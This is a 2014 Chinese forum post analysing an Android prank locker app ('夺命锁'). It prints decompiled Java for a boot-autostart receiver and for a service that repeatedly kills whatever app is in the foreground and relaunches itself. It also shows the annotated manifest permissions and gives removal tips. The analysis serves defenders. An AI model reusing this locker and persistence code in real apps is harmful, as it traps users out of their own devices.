夺命锁apk恶意程序简单分析

Sp4ce · 发表于 2014-9-10 23:56

本帖最后由轩少于 2014-9-11 20:47 编辑

文件相关信息:
C:\Documents and Settings\Administrator\桌面\夺命锁\1.apk
大小: 33528 字节
修改时间: 2014年7月8日, 15:05:48
MD5: EB447AF6B1824530FE63359A33467B13
SHA1: A5D9C553A7706A6A88C16F2221268C1B4A98A906
CRC32: F19DD189

因为这是本论坛一位用户发的样本，我以前也见过，差点被阴了。。
帖子地址：http://www.52pojie.cn/thread-271399-1-1.html
样本下载地址：http://www.52pojie.cn/forum.php? ... DM1fDI3MTM5OQ%3D%3D

使用工具：AXMLPrinter2
dex2jar
jd_Gui
XMLView（不带要用记事本的用这个看翻译过XML文档，记得把txt改为.xml后缀）

1.使用解压软件右键解压得到以下文件：

2.下载dex2jar工具解压：
把classes.dex 拷贝到dex2jar目录下：在路径上输入cmd后再输入：dex2jar.bat classes.dex 回车后
得到文件：classes_dex2jar.jar

3.使用jd_Gui打开刚才得到classes_dex2jar.jar文件：

4.查看具体代码：
BootBroadcastReceiver代码如下：

[Java] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

package tk.jianmo.study;
 
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
 
public class BootBroadcastReceiver extends BroadcastReceiver
{
  String action_boot = "android.intent.action.BOOT_COMPLETED";
 
  @Override
  public void onReceive(Context paramContext, Intent paramIntent)
  {
    try
    {
      Class localClass = Class.forName("tk.jianmo.study.MainActivity");
      Intent localIntent = new Intent(paramContext, localClass);
      localIntent.addFlags(268435456);
      paramContext.startActivity(localIntent);
      return;
    }
    catch (ClassNotFoundException localClassNotFoundException)
    {
      NoClassDefFoundError localNoClassDefFoundError = new NoClassDefFoundError(localClassNotFoundException.getMessage());
      throw localNoClassDefFoundError;
    }
  }
}

BuildConfig代码如下：

[Java] 纯文本查看 复制代码

1

2

3

4

5

[/font][/color][font=微软雅黑][color=#ff0000]public final class BuildConfig[/color]
[color=#ff0000]{[/color]
[color=#ff0000]  public static final boolean DEBUG = true;[/color]
[color=#ff0000]}[/color]
[/font][color=#ff00][font=微软雅黑]

R文件代码如下：

[Java] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

[/font][/color][font=微软雅黑][color=#ff0000]package tk.jianmo.study;[/color]
[color=#ff0000]
[/color]
[color=#ff0000]public final class R[/color]
[color=#ff0000]{[/color]
[color=#ff0000]  public static final class attr[/color]
[color=#ff0000]  {[/color]
[color=#ff0000]  }[/color]
[color=#ff0000]
[/color]
[color=#ff0000]  public static final class drawable[/color]
[color=#ff0000]  {[/color]
[color=#ff0000]    public static final int d1 = 2130837504;[/color]
[color=#ff0000]    public static final int d2 = 2130837505;[/color]
[color=#ff0000]    public static final int ic_launcher = 2130837506;[/color]
[color=#ff0000]    public static final int mybutton = 2130837507;[/color]
[color=#ff0000]    public static final int sp = 2130837508;[/color]
[color=#ff0000]  }[/color]
[color=#ff0000]
[/color]
[color=#ff0000]  public static final class id[/color]
[color=#ff0000]  {[/color]
[color=#ff0000]    public static final int bn_bf = 2131034112;[/color]
[color=#ff0000]    public static final int bn_hy = 2131034113;[/color]
[color=#ff0000]    public static final int mainTextViewTime = 2131034114;[/color]
[color=#ff0000]  }[/color]
[color=#ff0000]
[/color]
[color=#ff0000]  public static final class layout[/color]
[color=#ff0000]  {[/color]
[color=#ff0000]    public static final int main = 2130903040;[/color]
[color=#ff0000]  }[/color]
[color=#ff0000]
[/color]
[color=#ff0000]  public static final class string[/color]
[color=#ff0000]  {[/color]
[color=#ff0000]    public static final int app_name = 2130968577;[/color]
[color=#ff0000]    public static final int hello = 2130968576;[/color]
[color=#ff0000]  }[/color]
[color=#ff0000]}[/color]
[/font][color=#ff00][font=微软雅黑]

killpoccessserve代码如下：

[Java] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

[/font][/color][font=微软雅黑][color=#ff0000]package tk.jianmo.study;[/color]
[color=#ff0000]
[/color]
[color=#ff0000]import android.app.ActivityManager;[/color]
[color=#ff0000]import android.app.ActivityManager.RunningTaskInfo;[/color]
[color=#ff0000]import android.app.Service;[/color]
[color=#ff0000]import android.content.ComponentName;[/color]
[color=#ff0000]import android.content.Context;[/color]
[color=#ff0000]import android.content.Intent;[/color]
[color=#ff0000]import android.os.Handler;[/color]
[color=#ff0000]import android.os.Handler.Callback;[/color]
[color=#ff0000]import android.os.IBinder;[/color]
[color=#ff0000]import android.os.Message;[/color]
[color=#ff0000]import java.util.List;[/color]
[color=#ff0000]import java.util.Timer;[/color]
[color=#ff0000]import java.util.TimerTask;[/color]
[color=#ff0000]
[/color]
[color=#ff0000]public class killpoccessserve extends Service[/color]
[color=#ff0000]{[/color]
[color=#ff0000]  Context context;[/color]
[color=#ff0000]
[/color]
[color=#ff0000]  @Override[/color]
[color=#ff0000]  public IBinder onBind(Intent paramIntent)[/color]
[color=#ff0000]  {[/color]
[color=#ff0000]    return null;[/color]
[color=#ff0000]  }[/color]
[color=#ff0000]
[/color]
[color=#ff0000]  @Override[/color]
[color=#ff0000]  public void onCreate()[/color]
[color=#ff0000]  {[/color]
[color=#ff0000]    this.context = this;[/color]
[color=#ff0000]    Handler.Callback local100000000 = new Handler.Callback()[/color]
[color=#ff0000]    {[/color]
[color=#ff0000]      public boolean handleMessage(Message paramAnonymousMessage)[/color]
[color=#ff0000]      {[/color]
[color=#ff0000]        ActivityManager localActivityManager = (ActivityManager)killpoccessserve.this.context.getSystemService("activity");[/color]
[color=#ff0000]        String str = ((ActivityManager.RunningTaskInfo)localActivityManager.getRunningTasks(1).get(0)).topActivity.getPackageName();[/color]
[color=#ff0000]        if (str.equals("tk.jianmo.study"));[/color]
[color=#ff0000]        while (true)[/color]
[color=#ff0000]        {[/color]
[color=#ff0000]          return false;[/color]
[color=#ff0000]          Intent localIntent = new Intent();[/color]
[color=#ff0000]          Context localContext = killpoccessserve.this.context;[/color]
[color=#ff0000]          try[/color]
[color=#ff0000]          {[/color]
[color=#ff0000]            Class localClass = Class.forName("tk.jianmo.study.MainActivity");[/color]
[color=#ff0000]            localIntent.setClass(localContext, localClass);[/color]
[color=#ff0000]            localIntent.setFlags(67108864);[/color]
[color=#ff0000]            localIntent.addFlags(268435456);[/color]
[color=#ff0000]            killpoccessserve.this.startActivity(localIntent);[/color]
[color=#ff0000]            localActivityManager.killBackgroundProcesses(str);[/color]
[color=#ff0000]          }[/color]
[color=#ff0000]          catch (ClassNotFoundException localClassNotFoundException)[/color]
[color=#ff0000]          {[/color]
[color=#ff0000]            NoClassDefFoundError localNoClassDefFoundError = new NoClassDefFoundError(localClassNotFoundException.getMessage());[/color]
[color=#ff0000]            throw localNoClassDefFoundError;[/color]
[color=#ff0000]          }[/color]
[color=#ff0000]        }[/color]
[color=#ff0000]      }[/color]
[color=#ff0000]    };[/color]
[color=#ff0000]    Handler localHandler = new Handler(local100000000);[/color]
[color=#ff0000]    Timer localTimer = new Timer();[/color]
[color=#ff0000]    TimerTask local100000001 = new TimerTask()[/color][color=#0000ff]//定时任务[/color]
[color=#ff0000]    {[/color]
[color=#ff0000]      private final Handler val$h;[/color]
[color=#ff0000]
[/color]
[color=#ff0000]      @Override[/color]
[color=#ff0000]      public void run()[/color]
[color=#ff0000]      {[/color]
[color=#ff0000]        this.val$h.obtainMessage().sendToTarget();[/color]
[color=#ff0000]      }[/color]
[color=#ff0000]    };[/color]
[color=#ff0000]    localTimer.schedule(local100000001, 0, '–');[/color]
[color=#ff0000]  }[/color]
[color=#ff0000]
[/color]
[color=#ff0000]  @Override[/color]
[color=#ff0000]  public void onDestroy()[/color]
[color=#ff0000]  {[/color]
[color=#ff0000]    super.onDestroy();[/color]
[color=#ff0000]  }[/color]
[color=#ff0000]
[/color]
[color=#ff0000]  @Override[/color]
[color=#ff0000]  public void onStart(Intent paramIntent, int paramInt)[/color]
[color=#ff0000]  {[/color]
[color=#ff0000]    super.onStart(paramIntent, paramInt);[/color]
[color=#ff0000]  }[/color]
[color=#ff0000]}[/color]
[/font][color=#ff00][font=微软雅黑]

经过AXMLPrinter2翻译后的main.xml代码就一行，
<?xml version="1.0" encoding="utf-8"?>

经过AXMLPrinter2翻译后的AndroidManifest.xml的代码如下：

<?xml version="1.0" encoding="utf-8"?>
<manifest
      xmlns:android="http://schemas.android.com/apk/res/android"
      android:versionCode="1"
      android:versionName="3.0"
      package="tk.jianmo.study"
      >
      <uses-sdk
            android:minSdkVersion="8"
            android:targetSdkVersion="11"
            >
      </uses-sdk>
      <application
            android:label="@7F040001"
            android:icon="@7F020002"
            android:debuggable="true"
            >
            <service
                     android:name=".killpoccessserve"//这个服务会循环检测当前的顶层程序是不是自己,如果不是自己,就杀掉它,并启动自己
                     >
            </service>
                     />

            <activity
                     android:theme="@android:01030007"
                     android:label="@7F040001"
                     android:name=".MainActivity"
                     >
                     <intent-filter
                              >
                              <action
                                    android:name="android.intent.action.MAIN"
                                    >
                              </action>
                              <category
                                    android:name="android.intent.category.LAUNCHER"
                                    >
                              </category>
                     </intent-filter>
            </activity>
            <receiver
                     android:name=".BootBroadcastReceiver"//实现开机自启
                     >
                     <intent-filter
                              >
                              <action
                                    android:name="android.intent.action.BOOT_COMPLETED"//开机广播（开机自启）
                                    >
                              </action>
                              <action
                                    android:name="android.intent.action.BOOT_COMPLETED"//开机广播（开机自启）
                                    >
                              </action>
                              <action
                                    android:name="android.intent.ACTION_SCREEN_OFF"//关机广播（应该是倒计时关机的）
                                    >
                              </action>
                              <action
                                    android:name="android.net.conn.CONNECTIVITY_CHANGE"//监听网络变化
                                    >
                              </action>
                              <action
                                    android:name="android.net.wifi.WIFI_STATE_CHANGED"//监听WIFI变化
                                    >
                              </action>
                              <action
                                    android:name="android.net.wifi.STATE_CHANGE"//检测WIFI状态
                                    >
                              </action>
                              <category
                                    android:name="android.intent.category.HOME"//更换安卓桌面
                                    >
                              </category>
                     </intent-filter>
            </receiver>
      </application>
      <uses-permission
            android:name="android.permission.ACCESS_WIFI_STATE"//允许程序访问Wi-Fi网络状态信息
            >
      </uses-permission>
      <uses-permission
            android:name="android.permission.CHANGE_WIFI_STATE"//改变WIFI状态
            >
      </uses-permission>
      <uses-permission
            android:name="android.permission.RECEIVE_BOOT_COMPLETED"//允许程序接收到 ACTION_BOOT_COMPLETED广播在系统完成启动（开机自启）
            >
      </uses-permission>
      <uses-permission
            android:name="android.permission.KILL_BACKGROUND_PROCESSES"//关闭后台程序
            >
      </uses-permission>
      <uses-permission
            android:name="android.permission.GET_TASKS"//检索正在运行的应用
            >
      </uses-permission>
      <uses-permission
            android:name="android.permission.WAKE_LOCK"//阻止手机进入休眠状态
            >
      </uses-permission>
</manifest>
小结：通过AndroidManifest.xml等，我们不难看出，这款APP索取了：开机自启、检测当前运行程序、关闭后台、前台程序、禁止系统进入休眠状态等权限，但它的性质终究是款恶作剧软件，它的锁屏界面保存在\res\文件夹下，它在打开的同时设定了一个定时任务（关机），并且实现开机自启，后台自启，想干掉它还是很容易的。

清理它的方法很多，在这里举几个例子：
1.进入recovery模式双WPIE操作（谨慎！手机中无重要文件可用！）
2.用手机助手PC端的程序清理
3.小米系统先按主屏键3秒然后杀掉进程再卸载（未测试……）

【另：感谢JJ师傅……】

小帥 · 发表于 2014-9-11 00:10

虽然看不懂，但是感脚很高深

huai201208 · 发表于 2014-9-11 00:01

哎呀，我是第一个。；留个脚步，虽然我都看不懂，但是看着这么多的英文，赞你一个！！！！

as593709348 · 发表于 2014-9-11 00:56

好可怕的样子

我可能干了 · 发表于 2014-9-11 06:08

能否简单易懂点

淡然出尘 · 发表于 2014-9-11 07:11

额为啥没有代码注释？

孤独无败 · 发表于 2014-9-11 07:40

提示: 作者被禁止或删除内容自动屏蔽

hu007 · 发表于 2014-9-11 08:09

谢谢分享，学习了

kangkai · 发表于 2014-9-11 08:12

轩少出马，必属精品。

fishyoyo · 发表于 2014-9-11 08:15

膜拜大神····

帐号		自动登录	找回密码
密码			注册[Register]

孤独无败孤独无败当前离线好友阅读权限 0 听众最后登录 1970-1-1 头像被屏蔽	孤独无败发表于 2014-9-11 07:40 提示: 作者被禁止或删除内容自动屏蔽
孤独无败孤独无败当前离线好友阅读权限 0 听众最后登录 1970-1-1 头像被屏蔽
	回复支持举报

[移动样本分析] 夺命锁apk恶意程序简单分析

点评